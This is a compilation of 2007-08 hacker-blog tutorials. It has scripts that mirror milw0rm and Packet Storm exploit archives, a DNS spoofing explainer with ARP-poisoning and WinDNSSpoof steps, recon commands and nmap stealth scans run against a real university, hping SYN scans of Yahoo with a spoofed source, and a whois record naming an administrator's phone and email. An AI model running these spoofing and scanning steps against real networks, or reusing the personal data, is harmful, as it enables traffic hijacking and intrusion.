Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

By d3hydr0

How to build a local exploit database.

How to build a local exploit database.
by d3hydr0 > http://darkcodecracker.blogspot.com/
Date: 03/07/08

In this tutorial I will show you several tools to create
your own local exploit database and how to search through
it. The 2 sites we will be using to gather exploits are
milw0rm and packetstorm. Well, first lets discuss why you
would need a local exploit database. Any answers? Here's mine,
because I can...

There are 3 scripts we will be using to create our database.
The first thing you need to deside is where you want your
exploits stored. Each script has a HOME_DIR option that needs
to be filled out according to your location (unless you like
/home/d3hydr8).

The first script will extract all exploits from packetstorm
from 2000-previous year. First, it will do a time check to
make sure the last year in the YEARS list is the previous year.

Years list:
YEARS = ["00","01","02","03","04","05","06","07"]

This is the first time I have used raw_input in one of my
scripts. It will show you the last year in the list and
the current year. Then ask you if this is correct. Like
shown below:


d3hydr8@linuxbox:~> python packext.py

[+] Checking Years

Last year: 07 Current Year: 08

Is this correct? Yes or No


Here is the c0de and a link:

http://www.darkc0de.com/misc/packext.py


#!/usr/bin/python
#This script will extract all exploits
#from packetstorm from 2000-previous year.

#http://darkc0de.com
#d3hydr8[at]gmail[dot]com

import urllib, tarfile, os, sys, time

HOME_DIR = "/home/d3hydr8/"
YEARS = ["00","01","02","03","04","05","06","07"]

#Time check
now = time.strftime("%Y", time.localtime())[2:]
print "\n[+] Checking Years\n"
if now == YEARS[-1]:
print "[!] The last year in YEARS cannot be the present year.\n"
sys.exit(1)
else:
print "Last year:",YEARS[-1],"Current Year:",now
resp = raw_input("\nIs this correct? Yes or No ").lower()
if resp == "no":
print "\n[!] Modify YEARS list correctly.\n"
sys.exit(1)
elif resp == "yes":
print "\n[+] Starting extraction"
else:
print "\nHUH?\n"
sys.exit(1)

#Make sure HOME_DIR ends with a "/"
if HOME_DIR[-1] != "/":
HOME_DIR = HOME_DIR+"/"
print "[+] Dir:",HOME_DIR,"\n"

#Extraction process
for year in YEARS:
print "Start: 20"+year
try:
os.chdir(HOME_DIR+year+"-exploits")
except(OSError):
os.mkdir(HOME_DIR+year+"-exploits")
os.chdir(HOME_DIR+year+"-exploits")
page = "http://packetstormsecurity.org/"+year+"12-exploits/20"+year+"-exploits.tgz"
urllib.urlretrieve(page, "20"+year+"-exploits.tgz")

tar = tarfile.open("20"+year+"-exploits.tgz")
tar.extractall()
tar.close()

os.remove("20"+year+"-exploits.tgz")
print "Done: 20"+year

print "\n[++] Operation Complete\n"


Here is what you should see when your done:


d3hydr8@linuxbox:~> python packext.py

[+] Checking Years

Last year: 07 Current Year: 08

Is this correct? Yes or No Yes

[+] Starting extraction
[+] Dir: /home/d3hydr8/exploits/

Start: 2000
Done: 2000
Start: 2001
Done: 2001
Start: 2002
Done: 2002
Start: 2003
Done: 2003
Start: 2004
Done: 2004
Start: 2005
Done: 2005
Start: 2006
Done: 2006
Start: 2007
Done: 2007

[++] Operation Complete




Now that we have all of the exploits from packetstorm through the
previous year. Lets use milw0rm to get an archive of remote ports
and platforms.

http://www.darkc0de.com/misc/milarchive.py


#!/usr/bin/python
#Extracts exploit archive for remote
#ports and platforms from milw0rm.

import urllib, tarfile, os

HOME_DIR = "/home/d3hydr8/"

#Make sure HOME_DIR ends with a "/"
if HOME_DIR[-1] != "/":
HOME_DIR = HOME_DIR+"/"
print "\n[+] Dir:",HOME_DIR,"\n"

try:
os.chdir(HOME_DIR)
except(OSError):
os.mkdir(HOME_DIR)
os.chdir(HOME_DIR)
print "[!] Downloading file..."
page = "http://www.milw0rm.com/sploits/milw0rm.tar.bz2"
urllib.urlretrieve(page, "milw0rm.tar.bz2")
print "[!] Extracting files..."
tar = tarfile.open("milw0rm.tar.bz2")
tar.extractall()
tar.close()
os.remove("milw0rm.tar.bz2")
print "\n[!] Operation Complete\n"

#Or
#wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
#tar -xjvf milw0rm.tar.bz2
#rm milw0rm.tar.bz2
#:)


Output:

What this does is create a milw0rm folder with the
directories platforms and rports.

d3hydr8@linuxbox:~> python milarchive.py

[+] Dir: /home/d3hydr8/exploits/

[!] Downloading file...
[!] Extracting files...

[!] Operation Complete



So, now we have packetstorm, remote port and platforms
but what about webapp exploits? The script below will
help you collect all the webapp exploits from milw0rm.
It will go page by page collecting 30 exploits at a
time and write them to your HOME_DIR+/milw0rm/. The script will
finish when it gets a xplt list length of zero 3x.

Becareful with this tool, set your times accordingly. Milw0rm
does have a DDOS protection with automatic ip blocking.

http://www.darkc0de.com/misc/milwebappext.py


#!/usr/bin/python
#Attempts to collect all webapp
#exploits from milw0rms DB.

import urllib2, time, os, re, urllib

HOME_DIR = "/home/d3hydr8/exploits"
site = "http://www.milw0rm.com/webapps.php?start="
#Time to wait between page loads (in secs)
TIME = "3"

#Make sure HOME_DIR ends with a "/"
if HOME_DIR[-1] != "/":
HOME_DIR = HOME_DIR+"/"
print "\n[+] Dir:",HOME_DIR,"\n"
HOME_DIR = HOME_DIR+"milw0rm/"

try:
os.chdir(HOME_DIR)
except(OSError):
os.mkdir(HOME_DIR)
os.chdir(HOME_DIR)

start = 0
error = 0
while error != 3:
try:
time.sleep(int(TIME))
print "[+] Page:",start
source = urllib2.urlopen(site+str(start), "80").read()
xplts = re.findall("href=\"/exploits/\d+",source)
print "[+] Exploits Found:",len(xplts)
except(urllib2.URLError):
xplt = []
pass
for xplt in xplts:
time.sleep(0.5)
xplt = xplt.replace("href=\"","")
urllib.urlretrieve("http://www.milw0rm.com"+xplt, HOME_DIR+xplt.rsplit("/",1)[1])
if len(xplt) == 0:
error +=1
start +=30
print "\n[!] Operation Complete\n"


Looking more closely at that c0de I'm guessing
you might be able to just change some site info
like exploits >> papers and collect all papers
(or whatever else).

This next script is just a utility for searching
for exploits from the command line from milw0rm.

http://www.darkc0de.com/misc/milsearch.py


#!/usr/bin/python
#Milw0rm exploits search tool.

import urllib2, re, sys

if len(sys.argv) != 2:
print "\nUsage: ./milsearch.py [search]"
print "Ex: ./milsearch.py phpmyadmin\n"
sys.exit(1)

site = "http://www.milw0rm.com/search.php?dong="

try:
source = urllib2.urlopen(site+sys.argv[1], "80").read()
xplts = re.findall("href=\"/exploits/\d+",source)
print "\n[+] Results Found:",len(xplts),"\n"
except(urllib2.URLError):
xplts = []
pass
if len(xplts) >=1:
for xplt in xplts:
xplt = xplt.replace("href=\"","")
print "http://milw0rm.com"+xplt
else:
print "\nNo Results Found\n"


Output:



Now your thinking, "Ok, I have a database of exploits
but how would I keep it up to date?". The script
below will help with this task. It will check milw0rm
for new exploits and download them to your HOME_DIR
if found. The default time is set to check every 5
minutes.

http://www.darkc0de.com/misc/milupdate.py


#!/usr/bin/python
#Checks milw0rm.com for exploit updates.

import urllib2, time, os, re, urllib

HOME_DIR = "/home/d3hydr8/exploits"
site = "http://www.milw0rm.com/"
#Time to wait for update checks (in secs)
TIME = "300"

#Make sure HOME_DIR ends with a "/"
if HOME_DIR[-1] != "/":
HOME_DIR = HOME_DIR+"/"
print "\n[+] Dir:",HOME_DIR,"\n"
HOME_DIR = HOME_DIR+"milw0rm/"

try:
os.chdir(HOME_DIR)
except(OSError):
os.mkdir(HOME_DIR)
os.chdir(HOME_DIR)

done = []
while 1:
time.sleep(int(TIME))
try:
source = urllib2.urlopen(site, "80").readlines()
for line in source:
if re.search("class=\"style15", line):
xplts = re.findall("href=\"/exploits/\d+", line)
except(urllib2.URLError):
xplts = []
pass
if len(xplts) >=1:
for xplt in xplts:
if xplt not in done:
done.append(xplt)
xplt = xplt.replace("href=\"","")
print "[+] Adding: http://www.milw0rm.com"+xplt
urllib.urlretrieve("http://www.milw0rm.com"+xplt, HOME_DIR+xplt.rsplit("/",1)[1])
print "[+] Collected:",len(done),"exploits\n"


If you haven't found an online module to search
through your exploits and bought the domain "exploits4fun.com"
there are a couple ways to search them. The first is use your
GUI search utilty that comes with your os. If using KDE's
Find Files/Folders just change your Name/Location to your
HOME_DIR and use the Contents tab to do the rest.



Or just use your find cmd. I hope this tutorial and tools
were fun. I realize this stuff is pretty much useless when
you could just visit the sites but I had fun writing it. And
remember, because I can...

XSS attacks

http://www.darkc0de.com/tutorials/XSS_attacks.pdf

Hey Wires Cracking Tutorial

http://orkutadminby.freehostia.com/DarkCodeCracker%20Files/Downloads/heywirescrktut.zip

What is DNS Spoofing?

What is DNS Spoofing ?


DNS Spoofing is the art of making a DNS entry to point to an another IP
than it would be supposed to point to. To understand better, let's see
an example.You're on your web browser and wish to see the news on
www.cnn.com, without to think of it, you just enter this URL in your
address bar and press enter.
Now, what's happening behind the scenes
? Well... basically, your browser is going to send a request to a DNS
Server to get the matching IP address for www.cnn.com, then the DNS
server tells your browser the IP address of CNN, so your browser to
connect to CNN's IP address and display the content of the main page.
Hold
on a minute... You get a message saying that CNN's web site has closed
because they don't have anymore money to pay for their web site. You're
so amazed, you call and tell that to your best friend on the phone, of
course he's laughing at you, but to be sure, he goes to CNN web site to
check by himself.
You are surprised when he tells you he can see the
news of the day as usual and you start to wonder what's going on. Are
you sure you are talking to the good IP address ?Let's check. You ask
your friend to fire up his favorite DNS resolving tool and to give you
the IP address he's getting for www.cnn.com.Once you got it, you put it
in your browser URL bar :

http://212.153.32.65

You feel ridiculous and frustrated when you see CNN's web page with its
daily news.
Well
you've just been the witness of a DNS hijacking scenario. You're
wondering what happened, did the DNS Server told you the wrong IP
address ? Maybe... At least this is the most obvious answer coming to
our mind.
In fact there are two techniques for accomplishing this DNS hijacking.
Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

As
you can imagine, a DNS server can't store information about all
existing names/IP on the net in its own memory space.That's why DNS
server have a cache, it enables them to keep a DNS record for a while.
In
fact, A DNS Server has the records only for the machines of the domain
it has the authority, if it needs to know about machines out of his
domain, it has to send a request to the DNS Server which handles these
machines and since it doesn't want to ask all the time about records,
it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS Server.
An
attacker his running is own domain (attacker.net) with his own hacked
DNS Server(ns.attacker.net) . Note that I said hacked DNS Server
because the attacker customized the records in his own DNS server, for
instance one record could be www.cnn.com=81.81.81.81
1) The attacker sends a request to your DNS Server asking it to resolve
www.attacker.net
2) Your DNS Server is not aware of this machine IP address, it doesn't
belongs to his domain, so it needs to asks to the responsible name
server.
3) The hacked DNS Server is replying to your DNS server,
and at the same time, giving all his records (including his record
concerning www.cnn.com) Note : this process is called a zone transfer.
4) The DNS server is not "poisoned".The attacker got his IP, but who
cares, his goal was not to get the IP address of his web server but to
force a zone transfer and make your DNS server poisoned as long as the
cache will not be cleared or updated.
5) Now if you ask your DNS
server, about www.cnn.com IP address it will give you 172.50.50.50,
where the attacker run his own web server. Or even simple, the attacker
could just run a bouncer forwarding all packets to the real web site
and vice versa,so you would see the real web site, but all your traffic
would be passing through the attacker's web site.

2) DNS ID Spoofing

We
saw that when a machine X wants to communicate with a machine Y, the
former always needs the latter IP address. However in most of cases, X
only has the name of Y, in that case, the DNS protocol is used to
resolve the name of Y into its IP address.
Therefore, a DNS request
is sent to a DNS Server declared at X, asking for the IP address of the
machine Y. Meanwhile, the machine X assigned a pseudo random
identification number to its request which should be present in the
answer from the DNS server.Then when the answer from the DNS server
will be received by X, it will just have to compare both numbers if
they're the same, in this case, the answer is taken as valid,otherwise
it will be simply ignored by X.
Does this concept is safe ? Not
completely. Anyone could lead an attack getting this ID number. If
you're for example on LAN, someone who runs a sniffer could intercept
DNS requests on the fly, see the request ID number and send you a fake
reply with the correct ID number... but with the IP address of his
choice.Then, without to realize it, the machine X will be talking to
the IP of attacker's choice thinking it's Y.

By the way, the DNS
protocol relies on UDP for requests (TCP is used only for zone
transfers), which means that it is easy to send a packet coming from a
fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't
provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplish this attack.
In
my example above, the attacker runs a sniffer, intercept the ID number
and replies to his victim with the same ID number and with a reply of
his choice.
In the other hand, even if the attacker intercepted your
request, it will be transmitted to the DNS Server anyway which will
also reply to the request(unless the attacker is blocking the request
at the gateway or carry out ARP cache poisoning which would make the
attack possible on a switched network by the way).
That means that
the attacker has to reply BEFORE the real DNS server, which means that
to succeed this attack, the attacker MUST be on the same LAN so to have
a very quick ping to your machine, and also to be able to capture your
packets.

Practical example ( for
testing purposes ONLY)
To see yourself how to hijack a connection from a machine on your local
area network,we can do the followings :
First step :Poison the ARP cache of the victim's machine (tools and explanations
for realizing this task can be found at http://www.arp-sk.org)
Second step :Now, outgoing packets of the target will be redirected to your host,but
you have to forward the traffic to the real gateway, this can be
achieved witha tool like Winroute Pro.
Third step :We then use WinDNSSpoof,
developed by valgasu (www.securiteinfo.org)
which isa tool that greatly help to carry out DNS ID Spoofing. (Before
to use this tool be sure you have the Winpcap library installed on your
machine, see http://winpcap.polito.it).We
run it in the cmd like :
wds -n www.cnn.com -i 123.123.123.123 -g 00-C0-26-DD-59-CF -v
This
will make www.cnn.com to point to 123.123.123.123 on the victim's
machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS
server.

8 linux commands for information gathering

8 Linux Commands for Information Gathering

by d3hydr0 > http://darkcodecracker.blogspot.com/
date: 12/19/07

1) dig

dig (domain information groper) is a flexible tool for interrogating DNS name
servers. It performs DNS lookups and displays the answers that are returned from
the name server(s) that were queried. Most DNS administrators use dig to
troubleshoot DNS problems because of its flexibility, ease of use and clarity of
output. Other lookup tools tend to have less functionality than dig.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> dig google.com

; <<>> DiG 9.4.1-P1 <<>> google.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8918
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 4

;; QUESTION SECTION:
;google.com. IN A

;; ANSWER SECTION:
google.com. 58 IN A 64.233.187.99
google.com. 58 IN A 64.233.167.99
google.com. 58 IN A 72.14.207.99

;; AUTHORITY SECTION:
google.com. 345549 IN NS ns1.google.com.
google.com. 345549 IN NS ns2.google.com.
google.com. 345549 IN NS ns3.google.com.
google.com. 345549 IN NS ns4.google.com.

;; ADDITIONAL SECTION:
ns1.google.com. 345549 IN A 216.239.32.10
ns2.google.com. 345549 IN A 216.239.34.10
ns3.google.com. 345549 IN A 216.239.36.10
ns4.google.com. 345549 IN A 216.239.38.10

;; Query time: 12 msec
;; SERVER: 24.158.63.8#53(24.158.63.8)
;; WHEN: Sun Jan 6 09:21:53 2008
;; MSG SIZE rcvd: 212

---------------------------------------------------------------------

2) nslookup

Nslookup is a program to query Internet domain name servers.

Examples of issueing a simple query:

nslookup name

nslookup IP_address

nslookup name server

nslookup IP_address server

---------------------------------------------------------------------
d3hydr8@linuxbox:~> nslookup 72.14.207.99
Server: 24.173.63.8
Address: 24.173.63.8#53

Non-authoritative answer:
99.207.14.72.in-addr.arpa name = eh-in-f99.google.com.

Authoritative answers can be found from:
207.14.72.in-addr.arpa nameserver = ns3.google.com.
207.14.72.in-addr.arpa nameserver = ns4.google.com.
207.14.72.in-addr.arpa nameserver = ns1.google.com.
207.14.72.in-addr.arpa nameserver = ns2.google.com.
ns3.google.com internet address = 216.239.36.10
ns4.google.com internet address = 216.239.38.10
ns1.google.com internet address = 216.239.32.10
ns2.google.com internet address = 216.239.34.10

---------------------------------------------------------------------

3) host

host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When
no arguments or options are given, host prints a short summary of its command line arguments and options.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> host google.com
google.com has address 64.233.167.99
google.com has address 72.14.207.99
google.com has address 64.233.187.99
google.com mail is handled by 10 smtp2.google.com.
google.com mail is handled by 10 smtp3.google.com.
google.com mail is handled by 10 smtp4.google.com.
google.com mail is handled by 10 smtp1.google.com.

---------------------------------------------------------------------

4) whois

whois searches for an object in a RFC 3912 database.

This version of the whois client tries to guess the right server to ask for the specified object. If no guess can be made it
will connect to whois.networksolutions.com for NIC handles or whois.arin.net for IPv4 addresses and network names.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> whois syr.edu

Domain Name: SYR.EDU

Registrant:
Syracuse University
Room 200 Machinery Hall
Syracuse, NY 13244
UNITED STATES

Administrative Contact:
Susan Heeley
Senior Administrator
Syracuse University
IT Dept.
Center for Science and Technology
Syracuse, NY 13244
UNITED STATES
(315) 443-2716
sheeley@syr.edu

Technical Contact:

NISC
Syracuse University
Room 200 Machinery Hall
Syracuse, NY 13244
UNITED STATES
(315) 443-2677
nisc@syr.edu

Name Servers:
LURCH.CNS.SYR.EDU 128.230.12.5
ICARUS.SYR.EDU 128.230.1.49
SUEC1.SYR.EDU 209.164.131.32
NS3.BROADWING.NET
NS4.BROADWING.NET

Domain record activated: 02-Sep-1986
Domain record last updated: 11-Jul-2007
Domain expires: 31-Jul-2008

---------------------------------------------------------------------

5) nmap

* we all know this one

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing.

---------------------------------------------------------------------

linuxbox:/home/d3hydr8 # nmap -P0 -sS syr.edu

Starting Nmap 4.50 ( http://insecure.org ) at 2008-01-06 09:45 EST
Interesting ports on cwis01.syr.edu (128.230.18.35):
Not shown: 1656 closed ports, 49 filtered ports
PORT STATE SERVICE
80/tcp open http
4045/tcp open lockd
7937/tcp open nsrexecd
7938/tcp open lgtomapper
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7

Nmap done: 1 IP address (1 host up) scanned in 215.657 seconds

---------------------------------------------------------------------

6) ping

ping uses the ICMP protocol's mandatory ECHO_REQUEST datagram to elicit an ICMP ECHO_RESPONSE from a host or gateway.
ECHO_REQUEST datagrams (``pings'') have an IP and ICMP header, followed by a struct timeval and then an arbitrary number of
``pad'' bytes used to fill out the packet.

---------------------------------------------------------------------

linuxbox:/home/d3hydr8 # ping -c 2 128.230.18.35
PING 128.230.18.35 (128.230.18.35) 56(84) bytes of data.
64 bytes from 128.230.18.35: icmp_seq=1 ttl=240 time=70.6 ms
64 bytes from 128.230.18.35: icmp_seq=2 ttl=240 time=69.6 ms

--- 128.230.18.35 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 69.685/70.155/70.625/0.470 ms

---------------------------------------------------------------------

7) traceroute (mtr)

As mtr starts, it investigates the network connection between the host mtr runs on and HOSTNAME. by sending packets with pur‐
posly low TTLs. It continues to send packets with low TTL, noting the response time of the intervening routers. This allows mtr
to print the response percentage and response times of the internet route to HOSTNAME. A sudden increase in packetloss or
response time is often an indication of a bad (or simply overloaded) link.

---------------------------------------------------------------------

linuxbox:/home/d3hydr8 # traceroute 128.230.18.35
traceroute to 128.230.18.35 (128.230.18.35), 30 hops max, 40 byte packets
1 192.168.1.1 (192.168.1.1) 1.934 ms 1.855 ms 2.097 ms
2 10.114.0.1 (10.114.0.1) 10.197 ms 12.492 ms 15.662 ms
3 172.22.5.13 (172.22.5.13) 16.707 ms 16.737 ms 8.981 ms
4 172.22.5.69 (172.22.5.69) 8.570 ms 12.523 ms 12.354 ms
5 172.22.32.114 (172.22.32.114) 14.607 ms 21.783 ms 11.076 ms
6 172.22.32.106 (172.22.32.106) 14.286 ms 14.387 ms 14.173 ms
7 12.86.87.29 (12.86.87.29) 18.481 ms 21.724 ms 14.085 ms
8 tbr2.attga.ip.att.net (12.122.96.74) 36.853 ms 40.701 ms 41.588 ms
9 tbr1.dlstx.ip.att.net (12.122.2.89) 46.345 ms 44.641 ms 47.791 ms
10 ggr3.dlstx.ip.att.net (12.123.16.193) 45.555 ms 44.932 ms 44.856 ms
11 br2-a3120s2.attga.ip.att.net (192.205.33.206) 46.336 ms 45.324 ms 35.904 ms
12 66.192.240.226 (66.192.240.226) 64.172 ms 63.947 ms 109.761 ms
13 64-132-176-170.static.twtelecom.net (64.132.176.170) 74.404 ms 77.708 ms 78.053 ms
14 128.230.61.1 (128.230.61.1) 78.784 ms 76.568 ms 78.336 ms
15 c6509r-srv.syr.edu (128.230.61.58) 77.995 ms 78.127 ms 78.214 ms
16 cwis01.syr.edu (128.230.18.35) 78.310 ms 70.660 ms 74.593 ms

---------------------------------------------------------------------


8) telnet

The telnet command is used to communicate with another host using the TELNET protocol. If telnet is invoked without the host
argument, it enters command mode, indicated by its prompt (telnet>). In this mode, it accepts and executes the commands listed
below. If it is invoked with arguments, it performs an open command with those arguments.

---------------------------------------------------------------------

d3hydr8@linuxbox:~> telnet os.edu 21
Trying 209.34.161.32...
Connected to os.edu.
Escape character is '^]'.
220 FTP server...

---------------------------------------------------------------------

Installing Python in windows and running a script

Installing Python in Windows and Running a Script

by d3hydro > http://darkcodecracker.blogspot.com/

date: 12/30/07


Installing Python in Windows and Running a Script


1.) First thing you need to do is visit http://www.python.org/download/ and download the Windows installer.

Download Link: http://www.python.org/ftp/python/2.5.1/python-2.5.1.msi

2.) After downloading the install file, locate it, right click and choose Install

3.) The first window that shows up gives you the choice of who to install python for.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtXiYdHh3Bj1hAZaSYrz16c6KP8N8wxlbltqbB7qn6pNGZKZXzbo7cxBMEU7wClLg2RFRRIXa6uk1VI1jzfwpF_oF82GtQqmQTaPtyNV0xn5xwQ2BsD3yZDDm8OrdWu_txlPVyXRp9fu4/s1600-h/1.jpg


4.) The second window is asking you where you would like python installed. Default
directory is C:\Python25\ but I have seen many people shorten it to C:\Py\ or C:\Python\.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnVENBi1tscP0nOnT8Mrb4WzubJpc19gw488tTXoqt7tOdOXfCsIZtq8d7c4bvYPP3Ip3Rov3U7hvUUgFUx9rvLsK-QEU-9L_ksybY0pJwIJyiAxvA_F-RP_YUDEeeC-FbmC2KV3uLiw/s1600-h/2.jpg

5) The third window is asking you how you would want python installed. You can
make your own judgements here but I suggest just clicking Next.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGKl8pYq3yDkyuHe4K8KOG8Cdbd1uXUxibDnd-E9hWDJ_AXEaE1ENJ4xH5SIL31baspeGm_kd1zL7CG_YRbSGTSbeX_FnrjVAuSWDYVd6gAJg4Z29_F-nIt0YZApvA05Uv65ZXkDdmXq4/s1600-h/3.jpg

6.) Thats it!!! At this point you should see it go through the installation process. Click Finish
when it is complete.

Now that python is installed lets go download a python script and run it.

1.) First we find a python script and save it with the extension .py
In the picture you can see we found a joomla scanner and saved it as joomlascan.py in our
Python directory C:\Python25

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8oelF4iX-YW-jmh67DQwpjclLzRcPMj4OfaKsNwJA2PdLcXm1HsiRraO9-bmhrrjJgN-kXvUsD8dKCJ3_yLWY-R6Ovru7AiJsgLLfPkq6h3T0SHjB-apt1Sfi-R8S3XMlo1o6AO-54Gg/s1600-h/4.jpg

2.) Now lets run the command prompt by going to Start >> Run and typing cmd.exe and hitting Enter
Your command prompt (cmd.exe) should load and be ready for commands.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYLH4UbOIDTJrSygt6-F2cA0zcYkUBeXYwH5elYnTsnVt-AxIxLt9TFyplH9SsDlwuYHbTE84YXWAGRtnpf1qNu4S6Go5XAUVmTs0ZuxIBOk8BjT2u2Cx3VxIuJ4t4JIOZZ3t5sjx37l4/s1600-h/5.jpg

3.) Now we need to move to where we installed python (C:\Python25) with the cd command.
After typeing cd C:\Python25 and hitting Enter you should see.

C:\Python25>_

4.) At this point you can use the dir command to view the files but we already know joomlascan.py is
in this directory.

5.) To run the script all you have to type is: python joomlascan.py
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgF_Zb-Eulp6pX9OG1uVRblohwkyTjKuFeGq2HBWThcl3f7nhyPmPG4f1-isGUcmCnGH_qe51vE56O9wi3ypUXjVRs9b3NNRP2gnDyk0zYjF4b420jySTgpaVnEKXqF88KzPHw4He9jLw/s1600-h/6.jpg

Ngrep Tutorial

ngrep - network grep tutorial

by d3hydr8 > www.darkc0de.com
date: 12/19/07

Homepage: http://ngrep.sourceforge.net/
Download: http://ngrep.sourceforge.net/download.html

Description:

ngrep strives to provide most of GNU grep's common features, applying them to
the network layer. ngrep is a pcap-aware tool that will allow you to specify
extended regular or hexadecimal expressions to match against data payloads of
packets. It currently recognizes IPv4/6, TCP, UDP, ICMPv4/6, IGMP and Raw across
Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands BPF
filter logic in the same fashion as more common packet sniffing tools, such as
tcpdump and snoop.

First, lets look at installing it. I'm not much of a writer so I will just show
the commands used throughout most of this tutorial.


hey guys this tutorial is getting error message when posting it here,so that's why we decided to post the tutorial in our own external link which is :-
http://orkutadminby.freehostia.com/DarkCodeCracker%20Files/Ngreptutorial.txt

Hping Tutorial

Hping - Active Network Security Tool
Hping Tutorial

by d3hydr0 > http://darkcodecracker.blogspot.com/
date: 12/24/07
Homepage: http://www.hping.org/
Download: http://www.hping.org/download.php
Description:
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface
is inspired to the ping(8) unix command, but hping isn't only able to send ICMP
echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute
mode, the ability to send files between a covered channel, and many other
features.
First, lets look at installing it. I'm not much of a writer so I will just show
the commands used throughout most of this tutorial.
---------------------------------------------------------------------
d3hydr8@linuxbox:~> ls grep hping
hping3-20051105.tar.gz
d3hydr8@linuxbox:~> tar xvf hping3-20051105.tar.gz
hping3-20051105/
hping3-20051105/CVS/
hping3-20051105/CVS/Root
hping3-20051105/CVS/Repository
hping3-20051105/CVS/Entries
[...]
d3hydr8@linuxbox:~> ls
hping3-20051105 hping3-20051105.tar.gz
d3hydr8@linuxbox:~> cd hping3-20051105
linuxbox:/home/d3hydr8/hping3-20051105 # ./configure
build byteorder.c...
create byteorder.h...
[...]
linuxbox:/home/d3hydr8/hping3-20051105 # make
gcc -c -O2 -Wall -DUSE_TCL -g libpcap_stuff.c
gcc -c -O2 -Wall -DUSE_TCL -g memlockall.c
[...]
linuxbox:/home/d3hydr8/hping3-20051105 # make install
cp -f hping3 /usr/sbin/
chmod 755 /usr/sbin/hping3
ln -s /usr/sbin/hping3 /usr/sbin/hping
ln -s /usr/sbin/hping3 /usr/sbin/hping2
linuxbox:/home/d3hydr8/hping3-20051105 # ./hping3 -v
hping version 3.0.0-alpha-1 ($Id: release.h,v 1.4 2004/04/09 23:38:56 antirez
Exp $)
This binary is TCL scripting capable
---------------------------------------------------------------------
Now that we have hping installed lets enter the hping3 interactive shell and
use the resolve command.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping3
hping3> hping resolve www.darkc0de.com
97.82.189.122
---------------------------------------------------------------------
You can find a complete list of commands in the hping3 API page.
http://wiki.hping.org/34
Hping2 is the old version of the tool supporting the command line interface,
while the new hping3 is the evolution that adds a Tcl scripting engine.
Since we will be working mainly with the command line, you will see me
using hping2 from here on. By using the --help command you will see a list
of commands supported by hping or scroll to the bottom of this tutorial.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping2 --help
usage: hping host [options]
---------------------------------------------------------------------
Lets start with some port scanning...
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # host yahoo.com
yahoo.com has address 66.94.234.13
[...]
linuxbox:/home/d3hydr8 # hping -I wlan0 -S 66.94.234.13 -p 80 -c 3
HPING 66.94.234.13 (wlan0 66.94.234.13): S set, 40 headers + 0 data bytes
len=40 ip=66.94.234.13 ttl=110 id=18735 sport=80 flags=SA seq=0 win=8192 rtt=95.7 ms
len=40 ip=66.94.234.13 ttl=112 id=18931 sport=80 flags=SA seq=1 win=8192 rtt=97.9 ms
len=40 ip=66.94.234.13 ttl=110 id=19104 sport=80 flags=SA seq=2 win=8192 rtt=94.4 ms
--- 66.94.234.13 hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 94.4/96.0/97.9 ms
---------------------------------------------------------------------
In this output you can see that we used the -I option to choose our interface
name (wlan0). You can get your interface name by using the ifconfig command.
We used the -S option for our scan type SYN aka Stealth scan. We
also chose to scan port 80 and only capture 3 packets using the -c option.
flags=SA >> open
flags=RA >> closed
As you can see by that little table port 80 was open. Lets try another
example with a few more flags.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping2 -I wlan0 -S 66.94.234.13 -M 3000 -p ++21 --fast
HPING 66.94.234.13 (wlan0 66.94.234.13): S set, 40 headers + 0 data bytes
len=40 ip=66.94.234.13 ttl=110 id=17176 sport=80 flags=SA seq=59 win=8192 rtt=100.5 ms
len=40 ip=66.94.234.13 ttl=112 id=22501 sport=443 flags=SA seq=422 win=8192 rtt=101.9 ms
---------------------------------------------------------------------
As you can see from this example we are doing another port scan but this time
incrementing the ports from 21 with the -p ++21 option (21,22,23,etc). We also
use the --fast option which is self-explanatory. The other option is the
-M 3000 which will set the TCP sequence number to 3000.
We all know how port scans can be noisy so lets use an option that will
help us out.
---------------------------------------------------------------------
linuxbox:/home/d3hydr8 # hping2 -I wlan0 -SA -a 192.168.1.100 66.94.234.13 -p ++21 --faster
HPING 66.94.234.13 (wlan0 66.94.234.13): SA set, 40 headers + 0 data bytes
len=40 ip=66.94.234.13 ttl=255 id=6899 sport=80 flags=R seq=0 win=0 rtt=0.0 ms
